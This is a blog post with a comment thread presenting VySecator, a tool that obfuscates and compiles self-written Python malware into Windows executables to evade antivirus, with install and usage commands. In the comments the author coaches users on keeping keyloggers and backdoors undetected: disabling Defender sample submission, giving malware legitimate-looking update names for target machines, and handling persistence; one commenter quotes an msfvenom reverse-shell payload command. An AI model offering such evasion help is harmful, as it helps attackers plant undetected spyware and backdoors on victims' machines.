• Home
  • Hacking & Security
    • Network Hacking
    • Web Hacking
    • Social Engineering
    • Kali Linux
    Submit An Article
  • Courses
    • All Courses
    • Bundles
    • Masterclass
    • VIP Membership
    • FAQ

    Popular Courses

  • Shop
    • Hardware Bundles
    • Wireless Adapters
    • Pentesting Tools
    • Security
    • Accessories
    • Clothing
    • Books
    • All
  • Competition
  • Services
    Penetration Testing
    Consulting
    Code Review
    One on one Training
    Online Courses
    VPN
  • Blog
      • Cart

    VIP Membership Masterclass
    Got a question?
    [email protected]
    RegisterLogin
    zSecurity
    • Home
    • Hacking & Security
      • Network Hacking
      • Web Hacking
      • Social Engineering
      • Kali Linux
      Submit An Article
    • Courses
      • All Courses
      • Bundles
      • Masterclass
      • VIP Membership
      • FAQ

      Popular Courses

    • Shop
      • Hardware Bundles
      • Wireless Adapters
      • Pentesting Tools
      • Security
      • Accessories
      • Clothing
      • Books
      • All
    • Competition
    • Services
      Penetration Testing
      Consulting
      Code Review
      One on one Training
      Online Courses
      VPN
    • Blog
        • Cart

      Hacking & Security

      VySecator – A useful tool made for Hackers and By Hackers

      • Posted by Vedant
      • Date July 17, 2020

      Hey There!

      Are you a ethical hacker and you program your own malware? Is it getting detected? Don’t Worry!
      My tool VySec is going to reduce your detection ratio to 1-3 AVs only!

      General Info about VySecator:

      VySec is made up of 2 main open-source and free python programs.
      VYSEC USES THESE COMMAND LINE ARGS FOR OPTION 3

      noconsole --onefile

      These are the main reason why you should Obfuscate you Malware and Compile to EXE
      Those two tools are Pyarmor and PyInstaller.
      VySec has 3 options too choose:

      1.Obfuscate the script
      2. Compile the Script to EXE (Without Obfuscation)
      3.Obfuscate and Compile to EXE (Best for Hackers!)

      I suggest option 3 if you have programmed your own malware and you want to make if FUD.

      PS: VYSEC REQUIRES PYTHON2, MAKE SURE TO INSTALL IT FIRST.

       

      Installation Process

      Detailed Info about Installation and other requirements included on my GitHub repo:
      https://github.com/VySec-Secure/VySecator

       

      Use the git clone command to download the source.

      git clone https://github.com/VySec-Secure/VySecator

       

      Once the download is completed, run the requirements.txt file using this command.

      pip install -r requirements.txt
      

      Usage

      If you get no errors then everything is installed properly and now you can run VySec.py using Python2.

      python ./VySec.py
      
      

       

      Now you will see 3 options like this.

      If want to use the 3rd Option which is Obfuscate and Compile. you simply have to type

      use 3

       

      Any other option you want to use, Simply add use at the beginning.

      Now VySec will ask for the path of your script. Enter the path and it will do the rest.

       

      The result will be stored in a folder named dist in the same folder where your original script is.

      • Share:
      Vedant
      Vedant

      Passionate In Penetration Testing, Ethical Hacking and Information Security.

      Previous post

      How To Be Anonymous / invisible online - protect your privacy & anonymity
      July 17, 2020

      Next post

      Beyond Maltego - The Complete OSINT Guide
      July 27, 2020

      You may also like

      domain-controllers_370x208
      Identifying Domain controller in a network
      24 March, 2023
      storm-braker_370x208
      Access Location, Camera & Mic of any Device 🌎🎤📍📷
      23 March, 2023
      Common-Authentication-Bypass-Techniques_370x208
      Common Authentication Bypass Techniques
      16 March, 2023

        47 Comments

      1. Aditya Negi
        July 21, 2020
        Log in to Reply

        Wow that’s great

        • Vedant
          Vedant Bhalgama
          July 21, 2020
          Log in to Reply

          Thanks Mate!
          If you are trying the tool and face any bugs, Please report them here
          https://github.com/Vedant-Bhalgama/VySecator/issues

          And also make sure to keep eyes on VySecator, New Updates are going to be released soon!

          • webmojoo
            July 22, 2020
            Log in to Reply

            Hello Vedant,

            After Obfuscate and Compile to .Exe and i tried to scan my exe file using antiscan.me and it says error file is to large (Max. 10 Mb).

            • Vedant
              Vedant Bhalgama
              July 22, 2020
              Log in to Reply

              Hi Webmojo!
              I think your .py file must be more than 7 or 8kb. Please can you send some Screenshots and tell me more about this?
              Make sure the file size is less than 8 KB

            • Vedant
              Vedant Bhalgama
              July 22, 2020
              Log in to Reply

              Also if your file is 8KB or more, The final size will be 28 MB. Which Is large.

            • Vedant
              Vedant Bhalgama
              July 22, 2020
              Log in to Reply

              If your file is more than 10 mb then try scanning your file here

              virscan.org

              Also see these screenshots,
              In the first one you can see that I have programmed a Backdoor which is of 3 KB only.
              https://easyupload.io/x7tx9n

              In the second one you can see that the Backdoor Final EXE size (with obfuscation, 3rd option in VySecator) is 5 Mb
              https://easyupload.io/w2d0bz

      2. Ujjwal Reddy K S
        July 22, 2020
        Log in to Reply

        error in path locator

        • Vedant
          Vedant Bhalgama
          July 22, 2020
          Log in to Reply

          Hi Ujjawal!

          Please report this issue here
          https://github.com/Vedant-Bhalgama/VySecator/issues

          I don’t know why you are getting this error but Let’s Solve this on GitHub!

      3. Ujjwal Reddy K S
        July 22, 2020
        Log in to Reply

        https://easyupload.io/z1y82o check the screenshot

        • Vedant
          Vedant Bhalgama
          July 22, 2020
          Log in to Reply

          Which Option are you using? Please can you specify more about this?

        • Vedant
          Vedant Bhalgama
          July 22, 2020
          Log in to Reply

          It seems that the file u.py doesnt exists

        • Vedant
          Vedant Bhalgama
          July 22, 2020
          Log in to Reply

          Hi Ujjwal!
          This is a big bug, And this tool is made for Windows Platforms. As it uses Pyarmor and Pyinstaller,
          So I think you should try this in Windows not on Kali Linux. Because this wont work on Kali Linux as Pyinstaller and Pyarmor dont support cross platform. I will soon make a Kali Linux Version

      4. GOWTHAM PONNANA
        July 24, 2020
        Log in to Reply

        Hi vedant, Really i am impressed by your program and my age is also 14 and i am a student who just one step more to advanced in Ethical Hacking,Python Programming, and also Social Enginerging…i think its help us a lot when we become friends..i think we will be good friends..mail me at- [email protected].

        • Vedant
          Vedant Bhalgama
          July 27, 2020
          Log in to Reply

          Hello Gowtham!
          Thank you so much mate! It was good to hear that even you are interested in Hacking, Because now a days, teens like us are only doing Gaming.

      5. Akabueze
        July 29, 2020
        Log in to Reply

        Hello, how do you add ico when you are Obfuscating and compiling to .EXE.

        Thanks

        • Vedant
          Vedant Bhalgama
          July 29, 2020
          Log in to Reply

          You can add it, But if you want that ico file should be there, I will add a support for it!

          • Akabueze
            July 30, 2020
            Log in to Reply

            Ok. Please I need support for it. I want to know the steps to add .ico when Obfuscating and compiling to .exe with your program.

            Thanks

            • Vedant
              Vedant Bhalgama
              July 30, 2020
              Log in to Reply

              Sure!

              I can’t tell you the steps here, But I am sure that after 20 Days (As my program gets updated every 20 days) I am going to bring a Update which can ask for an ico file. Please be patient for now because I am stuck on a big thing!

          • Akabueze
            July 30, 2020
            Log in to Reply

            Please, can we get the support for adding ico to file.

            • Vedant
              Vedant Bhalgama
              July 31, 2020
              Log in to Reply

              Hey man! I already told you that I will add that in next update soon! Please be patient as I am also busy in other work.

            • Vedant
              Vedant Bhalgama
              August 1, 2020
              Log in to Reply

              Hi Akabuze!
              I am happy to tell you that I finally have figured out a way in which you can add icon to the generated exe, I will update my tool today maybe after 2- 3 hours!

            • Vedant
              Vedant Bhalgama
              August 1, 2020
              Log in to Reply

              Hi Akabuze!

              I have finally added a support in which you can add a custom icon file to the EXE.
              Also when you will icon and compile to exe, You won’t be able to see the icon in the generated exe on Kali Linux, When you will send the file to the Windows Machine, The target user will be able to see the icon! ALSO MAKE SURE THAT ONLY ICO FILE TYPE EXTENSION IS SUPPORTED!

              Here is the link
              https://github.com/Vedant-Bhalgama/VySecator

      6. Akabueze
        July 29, 2020
        Log in to Reply

        Also, do I have to install pyarmor before installing VYSecator

        Thanks

        • Vedant
          Vedant Bhalgama
          July 29, 2020
          Log in to Reply

          Hi! Please see your mail! I have replied you there, Kali Linux Version of my Program has been Released, Just download it from here and run the setup.py file first and then run the VySec.py

          https://github.com/Vedant-Bhalgama/VySecator

        • Vedant
          Vedant Bhalgama
          July 29, 2020
          Log in to Reply

          Also Please read the documentation

      7. Akabueze
        July 30, 2020
        Log in to Reply

        I get error when I use 3. At the end of the obfuscation and compiling, I get this error message. INFO ERROR: Too big code, the limitation is 32768 bytes in trial version.

        • Vedant
          Vedant Bhalgama
          July 30, 2020
          Log in to Reply

          This error comes because the path which you entered, is having more than 1 script, For the best results, Make sure you have only 1 Script in that path,

          In short, Make a new Folder and paste your script there, And then use the 3rd Option, This error comes because there are more than 5 Files.

        • Vedant
          Vedant Bhalgama
          July 30, 2020
          Log in to Reply

          Also, It would be more better if you open a issue on my GitHub Repo and submit me screenshots of the errors you get , Also make sure that you only have 1 File in the Path and if only 1 File is there in the path, Make sure that the file size is less than 32768 Bytes

          https://github.com/Vedant-Bhalgama/VySecator/issues

      8. Akabueze
        July 30, 2020
        Log in to Reply

        I was also using it in Kali Linux but I got that error.

      9. Akabueze
        July 30, 2020
        Log in to Reply

        This is what happens when I use 3 on my program

        https://ibb.co/QQY71kL

        https://ibb.co/DMhZp5L

        They errors I got after following your guide to obfuscate and compile to exe

        • Vedant
          Vedant Bhalgama
          July 30, 2020
          Log in to Reply

          First error says that there is no file such as Windows Explorer.exe , Because it is a persistent keylogger, Also In your Python Code you must have coded to copy the Original Keylogger using shutil and then paste it in AppData and then add the values to registry, So I think to fix this error, You will need to remove the persistence line because there is no such file on Linux Windows Explorer.exe.

          Short Answer
          There is no Windows Explorer.exe file on Linux, So you will have to remove the persistence, Or else there is some error in the code, Because I also made a persistent Backdoor and compiled using my program which didnt cause any errors like this

          For the second error, I have already told that the either your KeyLogger file is big, Or else there are too many Python Files in the same directory for which you are giving the path to my tool for 3rd option

        • Vedant
          Vedant Bhalgama
          July 30, 2020
          Log in to Reply

          Also please provide a clear picture! So I can see the whole logs

        • Vedant
          Vedant Bhalgama
          July 30, 2020
          Log in to Reply

          Also, For the second error, You can see there are too many files in the same path, That’s why it is causing the error!

      10. Ayush7011
        July 30, 2020
        Log in to Reply

        can you prefer us the number of courses you did to completed Intermediate level of Ethical Hacking and Python Programming? please let us know

      11. Ayush7011
        July 30, 2020
        Log in to Reply

        can you prefer us the number of courses you did to completed Intermediate level of Ethical Hacking and Python Programming? please let us know Vedant Bhalgama

        • Vedant
          Vedant Bhalgama
          July 30, 2020
          Log in to Reply

          I completed the Ethical Hacking and scratch course of Zaid, Also I completed Python and Ethical Hacking Course, After this i am having intermediate experience in hacking, Right now I have enrolled in Web Site Hacking Course

      12. Vedant
        Vedant Bhalgama
        July 30, 2020
        Log in to Reply

        To all the people who are viewing this blog post, I wanted announce that The Windows Version of VySecator has been removed, I have added a Kali Linux Version for it, So it is suggested to read the new Documentation on the GitHub Repo of my tool, I will mention the link at the end, Also If you get any errors, Please make sure to report them to me, So I can improve my Program. So, Please make sure to download the Kali Linux Version of VySecator. Also I have added a setup.py file which will install some of the necessary dependencies such as wine, Which is very important for the Kali Linux Version of my tool!

        https://github.com/Vedant-Bhalgama/VySecator/

        Happy Hacking!
        Vedant Bhalgama

      13. Tho2011
        July 31, 2020
        Log in to Reply

        Very Good Vedant,
        Impressive work at this age.
        Keept up your passion.
        Tushar

        • Vedant
          Vedant Bhalgama
          August 1, 2020
          Log in to Reply

          Thank You So Much Tushar!

          Please makes sure to try my tool!

      14. Akabueze
        July 31, 2020
        Log in to Reply

        Hello, I like your work, it’s really reducing AV detections. But how do we package programs that use multiple files. Are we supposed to move all the py files including the file that calls the class to the same location before we convert? Or we should just copy only file that calls the class to a separate folder before converting.

        Thanks

        • Vedant
          Vedant Bhalgama
          August 1, 2020
          Log in to Reply

          You can copy the contents of the code of the file and paste it in the file which you want to compile! But because of this, size can increase of the file, So it is recommended to not to do this method.

          About the second method, This method is not going to work because there is no such option for that, And even If it works, Whenever you will send the file to target machine. They are going to get errors that this class was not found

        • Vedant
          Vedant Bhalgama
          August 1, 2020
          Log in to Reply

          Thank You! But please make sure to report any bugs in my program whenever you find them here https://github.com/Vedant-Bhalgama/VySecator/issues. Because it helps me improve my program

      15. Akabueze
        August 2, 2020
        Log in to Reply

        Hello,

        I noticed something. After using 3 on my keylogger script, I scanned with antiscan.me and I only got 5 detections but was not detected by windows defender but when I tried it on my virtual machine, windows defender detected it and won’t allow it to execute.. how is this possible?

        Thanks

        • Vedant
          Vedant Bhalgama
          August 3, 2020
          Log in to Reply

          See, First of all, antiscan.me and other Virus Scanners are not always 100% Sure. Also, When you are testing your malware on Windows, Then you should turn on Sample Submission off in the Windows Defender settings, Because whenever you execute a program. They will submit a sample of it to their Developers, And they can easily identify that this is a malware.

          There is 1 Solution for this.
          Try my tool again, Use the 3rd option, And this time rename your KeyLogger file to something different like Security-Update or Update-KB5674523 or any random name, BUT MAKE SURE TO KEEP A NAME WHICH LOOKS LEGIT, IT SHOULD NOT LOOK THAT IT IS A KIND OF MALICIOUS FILE. And see what happens next.

        • Vedant
          Vedant Bhalgama
          August 3, 2020
          Log in to Reply

          You should try this again, because this even happened with me. But after I tried it again, Windows Defender also didn’t detect it.

      16. shivam kushwah
        August 4, 2020
        Log in to Reply

        1. i made a python payload using
        msfvenom -p python/meterpreter/reverse_tcp lhost=abcd lport=xyz > /root/Desktop/payload.py
        2. i used option3 and got an executable file (.exe) without any error but
        when i start the application on target machine it is giving an fatal error “failed to execute script payload” and my session died
        please help

        • Vedant
          Vedant Bhalgama
          August 4, 2020
          Log in to Reply

          Hi Shivam!

          First of all, I request you to please read the documentation of my tool. https://github.com/Vedant-Bhalgama/VySecator, I have clearly mentioned that my tool can’t be used to Obfuscate and Compile TO EXE for the MsfVenom payloads, if you have made your own Malware (Backdoor, Keylogger, etc.) in python only, then you can use my tool!

          Currently I am working on a way in which we can Obfuscate and Compile MsfVenom Payloads.

          Please be patient!
          Thanks,
          Vedant

      Leave A Reply Cancel reply

      You must be logged in to post a comment.

      Categories

      • Cryptography
      • Cryptography
      • CTF
      • Forensics
      • Hacking & Security
      • Hardware
      • IOT
      • Kali Linux
      • Network Hacking
      • News
      • OSINT
      • Post Exploitation
      • Post Exploitation
      • Privacy
      • Programming
      • Security
      • Social Engineering
      • Uncategorized
      • Web Hacking

      Popular Posts

      Got a Blank Screen After Importing Kali in Virtual Box ? Here’s How To Fix It
      25Jan2018

      Connect with us

      • Facebook
      • Twitter
      • LinkedIn
      • Instagram
      • Youtube

      “Everything related to ethical hacking

      & cyber security in one place.”

      Quick Links

      • Home
      • About Us
      • Hacking & Security
      • Download Custom Kali
      • Contact
      • FAQ

      Services

      • Penetration Testing
      • Consulting
      • Code Review
      • One on one training
      • VPN
      • VIP Membership

      Company

      • About Us
      • Contact
      • Vulnerability Disclosure

      Support

      • FAQ
      • Forums

      Copyright © 2022 Z IT SECURITY LTD t/a zSecurity. All rights reserved.

      • Privacy
      • Shipping
      • Refunds
      • Terms

      Contribute

      Share your knowledge with the world

      SUBMIT AN ARTICLE

      Login with your site account

      Lost your password?

      Not a member yet? Register now

      Register a new account


      Are you a member? Login now

      Enroll in this course to access this lesson!

      All of our courses include:

      ✔ Lifetime, unlimited access to course materials & training videos.

      ✔ Watch online or download lectures for offline use.

      ✔ Verifiable certificate of completion from zSecurity, signed by the course instructor, Zaid.

      ✔ Get answers from our Support Team within a maximum of 15 hours.

      ✔ Unlimited Updates.

      Get free 1 month VIP membership per course with:

      ✔ Live mentorship and Q&A session with the course instructor, Zaid.

      ✔ Instant support from community members through our private discord channel.

      ✔ Daily updates with the latest tutorials & news in the hacking world.

      ✔ Daily resources like CTFs, bug bounty programs, onion services and more!

      ✔ Access our VIP community & connect with like-minded people.

      ✔ Discounts on other zSecurity products and services.

      We are using cookies to give you the best experience on our website. This includes but is not limited to:

      • Storing your settings and preferences.
      • Remember your access information
      • Track website performance and make our website more relevant to you.

      You can find out more about which cookies we are using or switch them off in settings.

      Privacy Overview

      This website uses cookies so that we can provide you with the best user experience possible. Cookie information is stored in your browser and performs functions such as recognising you when you return to our website and helping our team to understand which sections of the website you find most interesting and useful.

      Strictly Necessary Cookies

      Strictly Necessary Cookie should be enabled at all times so that we can save your preferences for cookie settings.

      3rd Party Cookies

      This website uses Google Analytics and Linkedin to collect anonymous information such as the number of visitors to the site, and the most popular pages.

      Keeping this cookies enabled helps us to improve our website.

      Please enable Strictly Necessary Cookies first so that we can save your preferences!

      Powered by  GDPR Cookie Compliance